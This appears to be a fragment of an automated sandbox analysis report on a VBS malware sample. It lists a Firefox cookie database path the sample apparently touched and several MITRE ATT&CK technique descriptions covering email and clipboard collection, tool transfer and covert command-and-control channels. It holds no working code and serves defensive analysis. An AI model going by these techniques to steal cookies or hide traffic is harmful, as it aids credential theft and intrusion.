C:\Users\user\AppData\Roaming\5drowjrx.mtw\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Windows Analysis Report
PUMP mt310143121.vbs

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre